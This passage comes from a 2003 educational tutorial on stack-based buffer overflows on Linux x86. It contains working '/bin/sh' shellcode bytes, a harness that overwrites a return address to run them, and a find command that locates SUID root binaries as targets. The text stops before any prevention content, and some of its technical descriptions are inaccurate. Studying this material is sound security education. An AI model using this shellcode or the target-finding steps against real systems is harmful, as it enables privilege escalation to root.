
Buffer Overflow Attack

Renjith Thomas


Buffer Overflow Attack by Renjith Thomas

Copyright © 2003 by Renjith Thomas

Revision History

Revision 1.0 15 Oct 2003 Revised by: RT

Table of Contents

Acknowledgement
1. Introduction
    Pre-requisites
    Linux File System Permissions
    Linux and the C programming language
2. What’s a Buffer Overflow?
    Memory layout
        Text Segment
        Data Segment
        Stack Segment
    EIP register, CALL & RET instructions
    ESP, EBP
    An Illustration
    A simple example
3. The Attack
    Shell Code
    How to execute /bin/sh ?
4. Creative stack smashing
    SUID root programs by distribution
5. Prevention and Security
    Finding Buffer Overflows
    Stack Smashing Prevention
        Program modification
        Compiler modifications
        CPU/OS kernel stack execution privilege
6. Conclusion
A. References


Acknowledgement

This document was prepared to give an overview of buffer overflows. I think I have been able to convey some of the subject in it. I am deeply grateful to the Head of the Computer Science Department, Dr. Agnisarman Namboodiri, for his support. I am grateful to Prof. Zainul Abid for his valuable guidance and suggestions. I am also grateful to all other faculty members of the Computer Science Department for their support. I gratefully remember all students of S7 CSE-B.


Chapter 1. Introduction

By combining the C programming language’s liberal approach to memory handling with specific Linux filesystem permissions, this operating system can be manipulated to grant unrestricted privilege to unprivileged accounts or users. A variety of exploit that relies upon these two factors is commonly known as a buffer overflow, or stack smashing, vulnerability. Stack smashing plays an important role in high-profile computer security incidents. In order to secure modern Linux systems, it is necessary to understand why stack smashing occurs and what one can do to prevent it.

Pre-requisites

To understand what goes on, some knowledge of C and assembly is required. Familiarity with virtual memory and some operating system essentials, such as how a process is laid out in memory, will be helpful. You MUST know what a setuid binary is, and of course you need to be able to use Linux systems, at least. Experience with gdb and cc is a real advantage. This document is specific to Linux on ix86; the details differ depending on the operating system or architecture you are using.

Here, I have tried out some small buffer overflows that can be easily grasped. The pre-requisites described above are explained in some detail below.

Linux File System Permissions

In order to better understand stack smashing vulnerabilities, it is first necessary to understand certain features of filesystem permissions in the Linux operating system. Privileges in the Linux operating system are invested solely in the user root, sometimes called the superuser; root’s infallibility is expected under every condition, including program execution. The superuser is the main security weakness in the Linux operating system. Because the superuser can do anything, a person who gains superuser privileges (for example, by learning the root password and logging in as root) can do virtually anything to the system. This explains why most attackers who break into Linux systems try to become superusers.

Each program (process) started by the root user inherits the root user’s all-inclusive privilege. In most cases the inherited privilege is subsequently passed to other programs spawned by root’s running processes. Set UID (SUID) permissions in the Linux operating system grant a user the privilege to run programs or shell scripts as another user.

In the Linux operating system, the process in memory that handles the program execution is usually owned by the user who executed the program. Using a unique permission bit to indicate SUID, the filesystem indicates to the operating system that the program will run under the file owner’s ID rather than the ID of the user who executed the program. Often SUID programs are owned by root; while these programs may be executable by an underprivileged user on the system, they run in memory with unrestricted access to the system. As one can see, SUID root permissions are used to grant an unprivileged user temporary, and necessary, use of privileged resources.
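The SUID bit described above can be inspected from C. The following is only a minimal sketch, assuming a POSIX system: the helper names is_suid_root() and path_is_suid_root() are made up for this illustration, while stat() and S_ISUID are the standard interfaces.

```c
#include <assert.h>
#include <stddef.h>
#include <sys/types.h>
#include <sys/stat.h>

/* Hypothetical helper: 1 if the owner/mode pair describes a SUID root file. */
static int is_suid_root(uid_t owner, mode_t mode)
{
    return owner == 0 && (mode & S_ISUID) != 0;
}

/* Returns 1 for a SUID root file, 0 otherwise, -1 if stat() fails. */
static int path_is_suid_root(const char *path)
{
    struct stat st;

    assert(path != NULL);
    if (stat(path, &st) != 0)
        return -1;
    return is_suid_root(st.st_uid, st.st_mode);
}
```

Calling path_is_suid_root() on a program such as a password-changing utility would typically report 1 on a system that ships it SUID root, but that depends on the distribution.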

Many Linux programs need to run with superuser privileges. These programs are run as SUID root programs, when the system boots, or as network servers. A single bug in any of these complicated programs can compromise the safety of your entire system. This characteristic is probably a design flaw, but it is basic to the design of Linux, and it is not likely to change. Exploitation of this “feature turned design flaw” is critical in constructing buffer overflow exploits.


Linux and the C programming language

The Linux operating system is inextricably linked to the C programming language. All modern implementations of the Linux operating system are written in the C programming language, including system binaries and the kernel. What C gains in simplicity and efficiency, it sacrifices in terms of data integrity and ease of use. The standard C library in most Linux implementations is vulnerable to buffer overflows and memory leaks. This is not to be interpreted as an error in the design of the language: C assumes the programmer is responsible for data integrity.

Once a variable is allocated memory space in C, the language does nothing to ensure that the expected contents of the variable fit into the allocated memory. C programmers often use the terms buffer and array interchangeably; thus, it is safe to define a buffer as a contiguous block of memory (core) that holds multiple instances of an identical data type.

As with all variables in C, buffers are declared dynamic or static. Static buffers are explicitly defined in the source code and are allocated at load time in the data segment in memory. Dynamic arrays are defined via pointers to memory locations in source code and are allocated at run time on the stack. Due to the obvious limitations on static arrays, dynamic allocation is the method used in all major programs and applications in the Linux environment. Thus, smashing the stack, or stack overflow, exploits are concerned only with programs that do dynamic allocation.


Chapter 2. What’s a Buffer Overflow?

Memory layout

If you know C, you most probably know what a character array is. Assuming that you code in C, you should already know the basic properties of arrays: arrays hold objects of the same type, e.g. int, char, float. Just like all other data structures, they can be classified as either "static" or "dynamic". Static variables are loaded into the data segment of the program, whereas dynamic variables are allocated and deallocated within the stack region of the executable in memory. "Stack-based" buffer overflows occur here: we stuff more data into a data structure, say an array, than it can hold, and we exceed the boundaries of the array, overwriting many important data. Simply put, it is copying 20 bytes to an array that can hold only 12 bytes.

The memory layout of a Linux binary is quite complex. It has become even more complex since ELF ("Executable and Linkable Format") and shared libraries were introduced. However, basically, every process starts running with 3 segments:

Text Segment

The Text Segment is a read-only part that includes all the program instructions. For example, the assembly instructions equivalent to the C code below will be included in this segment:

for (i = 0; i < 10; i++)
    s += i;

Data Segment

The Data Segment is the block where initialized and uninitialized (the latter also known as BSS) data is stored. For example, if you code:

int i;

the variable is an uninitialized variable, and it’ll be stored in the "uninitialized variables" part of the Data Segment (BSS). And if you code:

int j = 5;

the variable is an initialized variable, and the space for the j variable will be allocated in the "initialized variables" part of the Data Segment.

Stack Segment

The Stack is a segment where dynamic variables (or, in C jargon, automatic variables) are allocated and deallocated, and where return addresses for functions are stored temporarily. For example, in the following code snippet, the variable i is created on the stack and destroyed as soon as the function returns:

#include <stdio.h>

int myfunc(void)
{
    int i;

    for (i = 0; i < 10; i++)
        putchar('*');
    putchar('\n');

    return 0;
}
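To tie the three segments together, here is a minimal sketch with one object of each kind. The names uninit_counter, init_counter and sum_below are invented for this illustration; the comments state where a typical Linux toolchain places each item.

```c
#include <assert.h>

int uninit_counter;      /* no initializer: BSS, zero-filled at program start */
int init_counter = 5;    /* explicit initializer: initialized data */

/* The instructions of this function live in the text segment. */
int sum_below(int n)
{
    int i;        /* automatic variables: created on the stack on entry, */
    int s = 0;    /* gone again when the function returns */

    assert(n >= 0);
    for (i = 0; i < n; i++)
        s += i;
    return s;
}
```

Running a tool such as nm or size on the compiled object is one way to see how the two globals are split between the BSS and the initialized data.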

If we are to symbolize the stack:

0xBFFFFFFF  ---------------------
            |                   |
            |         .         |
            |         .         |
            |         .         |
            |         .         |
            |        etc        |
            | env/argv pointer. |
            |       argc        |
            |-------------------|
            |                   |
            |       stack       |
            |                   |
            |         |         |
            |         |         |
            |         V         |
            /                   /
            \                   \
            |                   |
            |         ^         |
            |         |         |
            |         |         |
            |                   |
            |       heap        |
            |-------------------|
            |        bss        |
            |-------------------|
            | initialized data  |
            |-------------------|
            |       text        |
            |-------------------|
            | shared libraries  |
            |       etc.        |
0x8000000   |-------------------|

_* STACK *_

In basic terms, the stack is a data structure that all of you will remember from your Data Structures courses, and it has the same basic operations. It is a LIFO (Last-In, First-Out) data structure. Its operations are controlled directly by the CPU via special instructions like PUSH and POP. You PUSH some data onto the stack, and POP some other data. Whoever comes in LAST is the one who goes out FIRST. So, in technical terms, the first item to be popped from the stack is the one that was pushed last.

The SP (Stack Pointer) register on the CPU contains the address of the data that will be popped from the stack. Whether SP points to the last data or to the one after the last data on the stack is CPU-specific; on the ix86 architecture, which is our subject, SP points to the address of the last data on the stack. In ix86 protected mode (32 bit/double word), PUSH and POP instructions work in 4-byte units. Another important detail to note here is that the stack grows downward: if SP is 0x100, then just after a PUSH EAX instruction SP will become 0xFC and the value of EAX will be placed at address 0xFC.



The PUSH instruction subtracts 4 from ESP (remember the above paragraph) and pushes a double word onto the stack, placing the double word at the address pointed to by the ESP register. The POP instruction, on the other hand, reads the address in the ESP register, POPs the value stored at that address from the stack, and adds 4 to ESP. Assuming that ESP is initially 0x1000, let’s examine the following assembly code:

PUSH dword1 ; value at dword1: 1, ESP's value: 0xFFC (0x1000-4)
PUSH dword2 ; value at dword2: 2, ESP's value: 0xFF8 (0xFFC-4)
PUSH dword3 ; value at dword3: 3, ESP's value: 0xFF4 (0xFF8-4)
POP EAX     ; EAX's value 3, ESP's value: 0xFF8 (0xFF4+4)
POP EBX     ; EBX's value 2, ESP's value: 0xFFC (0xFF8+4)
POP ECX     ; ECX's value 1, ESP's value: 0x1000 (0xFFC+4)
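The PUSH and POP sequence above can be replayed with a small C model. This is a toy sketch, not how the CPU is implemented: struct toy_stack and the toy_* functions are hypothetical names, and a plain byte array stands in for the memory below 0x1000.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define STACK_TOP 0x1000u   /* initial ESP, as in the listing above */

/* Toy model: mem[] stands in for addresses 0 .. STACK_TOP - 1. */
struct toy_stack {
    uint32_t esp;
    unsigned char mem[STACK_TOP];
};

static void toy_init(struct toy_stack *s)
{
    s->esp = STACK_TOP;
    memset(s->mem, 0, sizeof s->mem);
}

/* PUSH: move ESP down by 4, then store the double word at the new ESP. */
static void toy_push(struct toy_stack *s, uint32_t value)
{
    assert(s->esp >= 4);
    s->esp -= 4;
    memcpy(&s->mem[s->esp], &value, 4);
}

/* POP: load the double word at ESP, then move ESP up by 4. */
static uint32_t toy_pop(struct toy_stack *s)
{
    uint32_t value;

    assert(s->esp + 4 <= STACK_TOP);
    memcpy(&value, &s->mem[s->esp], 4);
    s->esp += 4;
    return value;
}
```

After toy_init(), pushing 1, 2 and 3 and then popping three times walks ESP through the same values as the comments in the assembly listing.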

The stack, besides being used as temporary storage for dynamic variables, is used to store the return addresses of function calls and to pass parameters to functions. And, of course, this is where evil things come into play.

EIP register, CALL & RET instructions

In each machine cycle, the CPU looks at what is stored in the Instruction Pointer register (in ix86 32-bit protected mode this is EIP, the Extended Instruction Pointer) to know what to execute next. The EIP register holds the address of the instruction that will be executed next. Usually the addresses are sequential, meaning that the next instruction to be executed is a few bytes ahead of the current instruction in memory. The CPU calculates those "few bytes" from the length in bytes of the current instruction, and adds that value to the address of the current instruction. To illustrate, assume that the present instruction’s address is 0x8048438. This is the value that is written in EIP, so the CPU is executing the instruction found at memory location 0x8048438. Say it is a PUSH instruction:

push %ebp

CPU knows that a PUSH instruction is 1 byte long, so the next instructionwill be at 0x8048439, which may be

mov %esp,%ebp

While executing the PUSH, CPU will put the address of MOV in EIP.

Okay, we said that the values put in EIP are calculated by the CPU itself. What if we JMP to a function? The addresses of the instructions in the function will be somewhere else in memory. After they are executed, how can the CPU know where to carry on in the calling procedure? For this, just before we JMP to the function, we could save the address of the next instruction in a temporary register, say EDX, and before returning from the function write the address in EDX back to EIP. Using JMP to jump to the addresses of functions would be very tiresome work.



However, the ix86 processor family provides us with two instructions, CALL and RET, that make our lives easy! The CALL instruction writes the address of the "next instruction to be executed after the function returns" (from now on, we’ll call this the "return address") to the stack: it PUSHes it onto the stack, and writes the address of the function to EIP. Thus, a function call is made. The RET instruction, on the other hand, POPs the "return address" from the stack and writes that address to EIP. Thus we safely return from the function and continue with the program’s next instruction.

Let’s have a look at the following code snippet:

x = 0;
function(1, 2, 3);
x = 1;

After the assembly instructions for (x = 0) have run, we need to go to the memory location where function() is located. As we said earlier, for this to happen without CALL, we would first copy the return address (the address of the instructions for x = 1 in this case) to some temporary space (perhaps a register), jump to the address of the function with JMP, and, at the end of the function, restore the return address that we had copied to EIP.

All these dirty operations are done on our behalf by the CPU itself via CALL and RET, as described above. Generally, the stack region of the program can be symbolized like this:

|_parameter_I____| ESP+8
|_parameter II___| ESP+4
|_return address_| ESP

ESP, EBP

The stack, as we’ve said, is also used to store dynamic variables. The CPU PUSHes data as the program requests new space, and POPs data when our program releases it. To address the memory locations, we use "relative addressing": we address the locations of data on our stack relative to some reference point. This reference point is ESP, which stands for Extended Stack Pointer. This register points to the top of the stack. Consider this:

void f()
{
    int a;
}

As you can see, in the f() function we allocate space for an integer variable named a. The space for the integer variable a will be allocated on the stack, and the computer will reference its address as ESP - some bytes. So the stack pointer is quite crucial for program execution. What if we call a function? The calling function has a stack and some local variables, meaning that it needs the stack pointer register. The function that is called from within it will also have local variables, and it will need the stack pointer too.

To overcome this, we save the old stack pointer. Just as we did for the return address, we PUSH the old ESP onto the stack, and use another register, named EBP, to reference local variables relatively in the callee function.



And this is the symbolization of the stack, if ESP is also PUSHed onto the stack:

|_parameter_I___| EBP+12
|_parameter II__| EBP+8
|_return address| EBP+4
|___saved_ESP___| EBP ESP
|_local var I __| EBP-4
|_local var II__| EBP-8

In the above picture, parameter I and II are the arguments passed to thefunction. After the return address and saved ESP, local var I and II are thelocal variables of the function. Now, if we sum up all we said, while calling afunction:

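• 1. We save the address of the next instruction (the return address), PUSHing it onto the stack. The CALL instruction does this.

• 2. We save the old stack pointer, PUSHing it onto the stack. The first instructions of the called function do this, which is why it sits below the return address in the picture above.

• 3. And we start executing the instructions of the function.

These 3 steps take place every time we call a subroutine, say a function.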

An Illustration

Let’s see the operation of the stack and the procedure prologue in a live example:

void fun(int a, int b, int c)
{
    char z[4];
}

void main()
{
    fun(1, 2, 3);
}

Compile this with the -g flag to enable debugging:

$ gcc -g a.c -o a

Let’s see what happened there:

$ gdb -q ./a
(gdb) disassemble main
Dump of assembler code for function main:
0x8048448 <main>:       pushl  %ebp
0x8048449 <main+1>:     movl   %esp,%ebp
0x804844b <main+3>:     pushl  $0x3
0x804844d <main+5>:     pushl  $0x2
0x804844f <main+7>:     pushl  $0x1
0x8048451 <main+9>:     call   0x8048440 <fun>
0x8048456 <main+14>:    addl   $0xc,%esp
0x8048459 <main+17>:    leave
0x804845a <main+18>:    ret
End of assembler dump.
(gdb)

As you can see above, in main() the first instruction is:

0x8048448 <main>: pushl %ebp

which backs up the old stack pointer. It pushes it onto the stack.



Then, copy the old stack pointer to the ebp register:

0x8048449 <main+1>: movl %esp,%ebp

Thus, from then on, in the function, we’ll reference function’s local variableswith EBP. These two instructions are called the "Procedure Prologue".

Then, we PUSH the function fun()’s arguments onto the stack in reverseorder:

0x804844b <main+3>:     pushl  $0x3
0x804844d <main+5>:     pushl  $0x2
0x804844f <main+7>:     pushl  $0x1

We call the function:

0x8048451 <main+9>: call 0x8048440 <fun>

As I’ve explained, by CALLing we PUSHed the address of the instruction addl $0xc,%esp, which is 0x8048456, onto the stack. After the function RETurned, we add 12 (0xc in hex) to ESP, since we pushed 3 arguments onto the stack, each taking 4 bytes (integers).
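The effect of CALL and RET on EIP can be mimicked in a few lines of C. This is a toy sketch only: struct toy_cpu, toy_call() and toy_ret() are hypothetical names, and the instruction length of 5 bytes is read off the dump above (the call sits at main+9 and the next instruction at main+14).

```c
#include <assert.h>
#include <stdint.h>

#define TOY_WORDS 16   /* hypothetical: room for 16 stacked double words */

/* Toy model of the state that CALL and RET touch. */
struct toy_cpu {
    uint32_t eip;                 /* address of the current instruction */
    uint32_t stack[TOY_WORDS];    /* stack contents, one slot per double word */
    int      depth;               /* number of double words currently pushed */
};

/* CALL: push the address of the following instruction, then jump. */
static void toy_call(struct toy_cpu *c, uint32_t target, uint32_t insn_len)
{
    assert(c->depth < TOY_WORDS);
    c->stack[c->depth++] = c->eip + insn_len;   /* the return address */
    c->eip = target;
}

/* RET: pop the return address straight into EIP. */
static void toy_ret(struct toy_cpu *c)
{
    assert(c->depth > 0);
    c->eip = c->stack[--c->depth];
}
```

With eip set to 0x8048451, toy_call(&c, 0x8048440, 5) stores 0x8048456 as the return address, and toy_ret() brings EIP back to it. Note that RET trusts whatever value is in that slot, which is the property the rest of this document builds on.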

Then we leave the main() function, and return:

0x8048459 <main+17>:    leave
0x804845a <main+18>:    ret

OK, what happened inside the function fun()?

(gdb) disassemble fun
Dump of assembler code for function fun:
0x8048440 <fun>:        pushl  %ebp
0x8048441 <fun+1>:      movl   %esp,%ebp
0x8048443 <fun+3>:      subl   $0x4,%esp
0x8048446 <fun+6>:      leave
0x8048447 <fun+7>:      ret
End of assembler dump.
(gdb)

The first two instructions are just the same: they are the procedure prologue. Then we see:

0x8048443 <fun+3>:      subl   $0x4,%esp

which subtracts 4 from ESP. This allocates space for the local variable z. We declared it as char z[4], remember? It is a 4-byte character array. And, at the end, the function returns:

0x8048446 <fun+6>:      leave
0x8048447 <fun+7>:      ret



A simple example

#include <string.h>

void fun(char *str)
{
    char foo[16];

    strcpy(foo, str);           /* no bounds check: overflows foo */
}

void main()
{
    char large_one[256];

    memset(large_one, 'A', 255);
    large_one[255] = '\0';      /* terminate the string for strcpy() */
    fun(large_one);
}

$ cc -W -Wall -pedantic -g c.c -o c
$ ./c
Segmentation fault (core dumped)

What we do above is simply write 255 bytes to an array that can hold only 16 bytes. We passed a large array of 256 bytes as a parameter to the fun() function. Within the function, without bounds checking, we copied the whole of large_one to foo, overflowing foo and the data beyond it. Thus the buffer is filled, and strcpy() also filled other portions of memory, including the return address, with A.

Here is the inspection of generated core file with gdb:

$ gdb -q c core
Core was generated by ‘./c’.
Program terminated with signal 11, Segmentation fault.
find_solib: Can’t read pathname for load map: Input/output error
#0 0x41414141 in ?? ()
(gdb)

As you can see, the CPU saw 0x41414141 (0x41 is the hex ASCII code for the letter A) in EIP, and tried to access and execute the instruction located there. However, 0x41414141 was not a memory address that our program was allowed to access. In the end, the OS sent a SIGSEGV (Segmentation Violation) signal to the program and stopped any further execution. When we called fun(), the stack looked like this:

|______*str______| EBP+8
|_return address_| EBP+4
|___saved_ESP____| EBP ESP
|______foo1______| EBP-4
|______foo1______| EBP-8
|______foo1______| EBP-12
|______foo1______| EBP-16

strcpy() copied large_one to foo without bounds checking, filling the stack with A, starting from the beginning of foo1 at EBP-16. Now that we can overwrite the return address, if we put the address of some other memory location there, can we execute the instructions at that location? The answer is yes.
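Why the debugger reports exactly 0x41414141 can be checked with a short sketch. The helper word_at() is a made-up name; it reads four consecutive bytes as one 32-bit word, which is what RET does with the overwritten return address slot.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Reads 4 consecutive bytes as one 32-bit word. */
static uint32_t word_at(const unsigned char *bytes)
{
    uint32_t word;

    assert(bytes != NULL);
    memcpy(&word, bytes, sizeof word);
    return word;
}
```

If a 4-byte slot has been filled with the letter A, word_at() on that slot yields 0x41414141 whatever the byte order of the machine, because all four bytes are identical.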



Assume that we place some /bin/sh-spawning instructions at some memory address, and we put that address in the return address slot of the function that we overflow. We can then spawn a shell, and most probably it will be a root shell, since you will be interested in setuid binaries.


Chapter 3. The Attack

Shell Code

As shown in the previous section, by manipulating dynamically allocated variables with unbounded byte copy operations, execution of arbitrary code is possible via the return address that is blindly ‘restored’ following a function exit. The ability to execute arbitrary code as the superuser is often used with calls that allow an attacker to continue executing commands as root indefinitely.

To obtain maximum root system privilege, the interactive Bourne shell program, /bin/sh, is spawned. The Bourne shell exists on every modern UNIX system, and is commonly the default system shell for the privileged user. Any system shell can be used as shell code; however, in the interest of keeping this study as generic as possible, /bin/sh is assumed.

In order to arrange an interactive shell situation, a static /bin/sh execution sequence must appear somewhere in memory so that a manipulated ‘return address’ can point to that location. This is accomplished by using a hexadecimal string holding the binary machine code equivalent to the standard C function call execve(name[0], name, NULL), where name[0] points to "/bin/sh". Assembly language equivalents to this call are hardware implementation dependent. Using debugging utilities, it is possible to dissect such a call by breaking it down into a simple assembly sequence, and to store it in a character array or other contiguous data structure. On an Intel x86 machine running Linux, the following is a list of steps used in formulating shell code:

• 1. The null terminated string /bin/sh exists somewhere in memory.

• 2. The address of the string /bin/sh exists somewhere in memory followedby a null long word.

• 3. 0xb is copied into the EAX register.

• 4. The address of the string /bin/sh is copied into the EBX register.

• 5. The address of the address of the string /bin/sh is copied into the ECX register.

• 6. The address of the null long word is copied into the EDX register.

• 7. The int $0x80 instruction is executed, a standard Intel CPU interrupt.

• 8. 0x1 is copied into the EAX register.

• 9. 0x0 is copied into the EBX register.

• 10. The int $0x80 instruction is executed, a standard Intel CPU interrupt.

This listing can be reduced to actual x86 shell code in a standard ANSI C character array.

How to execute /bin/sh ?

In C, the code to spawn a shell would be like this:

#include <unistd.h>

void main()
{
    char *shell[2];

    shell[0] = "/bin/sh";
    shell[1] = NULL;

    execve(shell[0], shell, NULL);
}

$ cc -W -Wall -pedantic -g shell.c -o shell
$ ./shell
bash$

If you look at the man page of execve, you’ll see that execve expects a pointer to the filename to be executed, a NULL-terminated array of arguments, and an environment pointer, which can be NULL. If you compile the program and run the output binary, you’ll see that you spawn a new shell.

So far so good... But we cannot spawn a shell this way in another program, can we? How can we send this code to the vulnerable program? As it stands, we can’t! This raises a new question: how can we pass our evil code to the vulnerable program? We will need to pass our code, which will probably be shell code, in the vulnerable buffer. For this to happen, we have to be able to represent our shell code as a string.

Thus we’ll list all the assembly instructions needed to spawn a shell, get their opcodes, list them one by one, and assemble them into a shell-spawning string. First, let’s see what the above code looks like in assembly. Let’s compile the program as static (this way, the execve system call will also be disassembled) and see:

$ gcc -static -g -o shell shell.c
$ objdump -d shell | grep \<__execve\>: -A 12
0804ca10 <__execve>:
 804ca10: 53              pushl  %ebx
 804ca11: 8b 54 24 10     movl   0x10(%esp,1),%edx
 804ca15: 8b 4c 24 0c     movl   0xc(%esp,1),%ecx
 804ca19: 8b 5c 24 08     movl   0x8(%esp,1),%ebx
 804ca1d: b8 0b 00 00 00  movl   $0xb,%eax
 804ca22: cd 80           int    $0x80
 804ca24: 5b              popl   %ebx
 804ca25: 3d 01 f0 ff ff  cmpl   $0xfffff001,%eax
 804ca2a: 0f 83 00 02 00  jae    804cc30 <__syscall_error>
 804ca2f: 00
 804ca30: c3              ret
 804ca31: 90              nop

Let’s analyze the syscall step by step: Remember, in our main() function, wecoded:

execve(shell[0], shell, NULL)

We passed: the address of string "/bin/sh", the address of NULL terminatedarray, NULL (in fact it is env address).

Here in the main:

$ objdump -d shell | grep \<main\>: -A 17
08048124 <main>:
 8048124: 55              pushl  %ebp
 8048125: 89 e5           movl   %esp,%ebp
 8048127: 83 ec 08        subl   $0x8,%esp
 804812a: c7 45 f8 ac 92  movl   $0x80592ac,0xfffffff8(%ebp)
 804812f: 05 08
 8048131: c7 45 fc 00 00  movl   $0x0,0xfffffffc(%ebp)
 8048136: 00 00
 8048138: 6a 00           pushl  $0x0
 804813a: 8d 45 f8        leal   0xfffffff8(%ebp),%eax
 804813d: 50              pushl  %eax
 804813e: 8b 45 f8        movl   0xfffffff8(%ebp),%eax
 8048141: 50              pushl  %eax
 8048142: e8 c9 48 00 00  call   804ca10 <__execve>
 8048147: 83 c4 0c        addl   $0xc,%esp
 804814a: c9              leave
 804814b: c3              ret
 804814c: 90              nop

Before the call to execve (call 804ca10 <__execve>), we pushed the arguments onto the stack in reverse order. So, if we turn back to __execve:

We copy the NULL (the env pointer) to the EDX register, we copy the address of the NULL-terminated array into the ECX register, we copy the address of the string "/bin/sh" into the EBX register, and we copy the syscall index for execve, which is 11 (0xb), to the EAX register. Then we change into kernel mode.

This is all we need. However, there are problems here. We cannot know exactly the addresses of the NULL-terminated array and of the string "/bin/sh". So, how about this?

xorl  %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl  %esp,%ebx
pushl %eax
pushl %ebx
movl  %esp,%ecx
cdql
movb  $0x0b,%al
int   $0x80

Let’s try to explain the above instructions. If you xor something with itself, you get 0, the equivalent of NULL. Here, we get a NULL in the EAX register. Then we push the NULL onto the stack. We push the string "//sh" onto the stack:

2f is /
2f is /
73 is s
68 is h

pushl $0x68732f2f

We push the string "/bin" onto the stack:

2f is /
62 is b
69 is i
6e is n

pushl $0x6e69622f

As you can guess, the stack pointer now holds the address of our NULL-terminated string "/bin//sh" (the doubled slash is harmless in a path name), because, starting from the stack pointer, which points to the top of the stack, we have a NULL-terminated character array. So, we copy the stack pointer to the EBX register. See, we have now placed the address of "/bin/sh" into the EBX register:

movl %esp,%ebx
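That the three pushes really leave a NULL-terminated path at the top of the stack can be verified with a small sketch. It relies on ix86 storing the least significant byte of a double word at the lowest address; store_le32() and stack_image() are names invented for this illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Stores a 32-bit value the way ix86 does: least significant byte first. */
static void store_le32(unsigned char *dst, uint32_t value)
{
    int i;

    assert(dst != NULL);
    for (i = 0; i < 4; i++)
        dst[i] = (unsigned char)((value >> (8 * i)) & 0xff);
}

/*
 * Rebuilds the 12 bytes that sit at ESP after the three pushes. The last
 * push ends up at the lowest address, so it comes first in memory order.
 * 'out' must have room for 12 bytes.
 */
static void stack_image(unsigned char *out)
{
    store_le32(out + 0, 0x6e69622fu);   /* pushed last:   "/bin" */
    store_le32(out + 4, 0x68732f2fu);   /* pushed second: "//sh" */
    store_le32(out + 8, 0x00000000u);   /* pushed first:  the NULL from EAX */
}
```

Reading the 12-byte image as a C string gives "/bin//sh", with the zero double word acting as the terminator.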



Then we need to set ECX to the address of the NULL-terminated array. To do this, we create a NULL-terminated array on our stack, very similar to the one above. First we PUSH a NULL. We can’t PUSH a literal NULL, because its zero bytes would end up inside our string and a copy routine such as strcpy() would stop at them, but we can PUSH a register that holds NULL. Remember that we xor’d the EAX register and have a NULL there, so let’s PUSH EAX to get a NULL on the stack:

pushl %eax

Then we PUSH the address of our string onto the stack; this is the equivalent of shell[0]:

pushl %ebx

Now that we have a NULL terminated array of pointers, we can save its ad-dress in ECX:

movl %esp,%ecx

What else do we need? A NULL in the EDX register. We could use movl %eax,%edx, but we can do this with a shorter instruction: cdq. This instruction sign-extends EAX into EDX; since EAX is 0 here, EDX becomes 0 as well:

cdql
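The behaviour of cdq can be written out in C to show why it only works as a shortcut while the sign bit of EAX is clear. This is a toy sketch; toy_cdq() is a hypothetical name and the function models nothing but the effect on EDX.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Toy cdq: fill EDX with copies of the sign bit (bit 31) of EAX. */
static void toy_cdq(uint32_t eax, uint32_t *edx)
{
    assert(edx != NULL);
    *edx = (eax & 0x80000000u) ? 0xffffffffu : 0x00000000u;
}
```

With EAX equal to 0, as it is after the xorl, EDX comes out as 0. Had EAX held a value with bit 31 set, EDX would have become 0xffffffff instead.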

We set EAX 0xb which is the syscall id of execve in system calls table.

movb $0x0b,%al

Then, we change into kernel mode:

int $0x80

After we go into kernel mode, the kernel will exec what we instructed it to, /bin/sh, and we will enter an interactive shell...

So, after this much philosophy, all we need is to convert these asm instructions into a string. So, let’s get the hexadecimal opcodes and assemble our evil code. Here we put our evil code in the character array sc[]. Let’s test our shell code:

char sc[] =                 /* 24 bytes */
    "\x31\xc0"              /* xorl %eax,%eax */
    "\x50"                  /* pushl %eax */
    "\x68""//sh"            /* pushl $0x68732f2f */
    "\x68""/bin"            /* pushl $0x6e69622f */
    "\x89\xe3"              /* movl %esp,%ebx */
    "\x50"                  /* pushl %eax */
    "\x53"                  /* pushl %ebx */
    "\x89\xe1"              /* movl %esp,%ecx */
    "\x99"                  /* cdql */
    "\xb0\x0b"              /* movb $0x0b,%al */
    "\xcd\x80"              /* int $0x80 */
    ;

int main()
{
    int *ret;

    ret = (int *)&ret + 2;  /* step from ret up to main()'s return address */
    *ret = (int)sc;         /* make the return address point at sc[] */
}

$ gcc -g -o shellcode shellcode.c
$ ./shellcode
bash$

Hmm, it works.

What we’ve done above is advance ret (a pointer to an integer, initialised to its own address) by 2 double words (8 bytes), thus reaching the memory location where main()’s return address is stored. Then, because ret now points to the return address slot, we stored the address of sc (our evil code) there. In effect, we changed the value of the return address so that it pointed to sc[]. When main() issued RET, the address of sc was written to EIP and, consequently, the CPU started executing the instructions there, resulting in the execution of /bin/sh.


Chapter 4. Creative stack smashing

SUID root programs included in Linux distributions are not precompiled with“shell code” as part of the binary. To exploit these type of programs, somemeans must be used to insert the shellcode array into the runtime envi-ronment. Stack smashers have devised creative ways to accomplish this. Inorder to inject the shell code into the runtime process, stack smashers havemanipulated command line arguments, shell environment variables, and in-teractive input functions with the necessary shell code sequence.

Not only do most stack smashing exploits rely upon shell code to accomplishtheir task, but these type of exploits depend on knowing at what addressin memory this shell code will reside. Taking this into consideration, manystack smashers have padded their shell code with NULL (or noop) assemblyoperations this gives the shell code a ‘wider space’ in memory and makesit easier to guess where the shell code may be when manipulating the re-turn address. This approach, combined with an approach whereby the shellcode is followed by many instances of the ‘guessed’ return address in mem-ory; is a common strategy used in constructing stack smashing exploits. Anadditional approach, when small programs with memory restrictions are ex-ploited, is to store the shellcode in an environment variable.

SUID root programs by distribution

In order to search standard Linux distributions for SUID root programs, the following command can be executed by the privileged user:

/usr/bin/find / -user root -perm -004000 -print

This command performs a system-wide search for SUID root files, which, as described, are crucial in constructing stack smashing exploits. On a Linux machine running the 2.0.30 kernel, built from a modified version of the Slackware distribution, 56 SUID root world-executable binaries existed on the system. A subtle byte copying error in any one of these programs could allow for a stack smashing vulnerability. By comparison, in a distribution of the Solaris operating system, approximately 67 SUID root world-executable programs existed on the system in total. As with the Linux distribution, an error in the code that handles dynamic string variables in any one of these system binaries could allow for a stack smashing vulnerability. Using Linux and Solaris as examples, one may conclude that a significant number of SUID root binaries exist in the typical Linux distribution. Any one of these programs can become a target for stack smashers; thus, protecting these files is a necessity.


Chapter 5. Prevention and Security

Finding Buffer Overflows

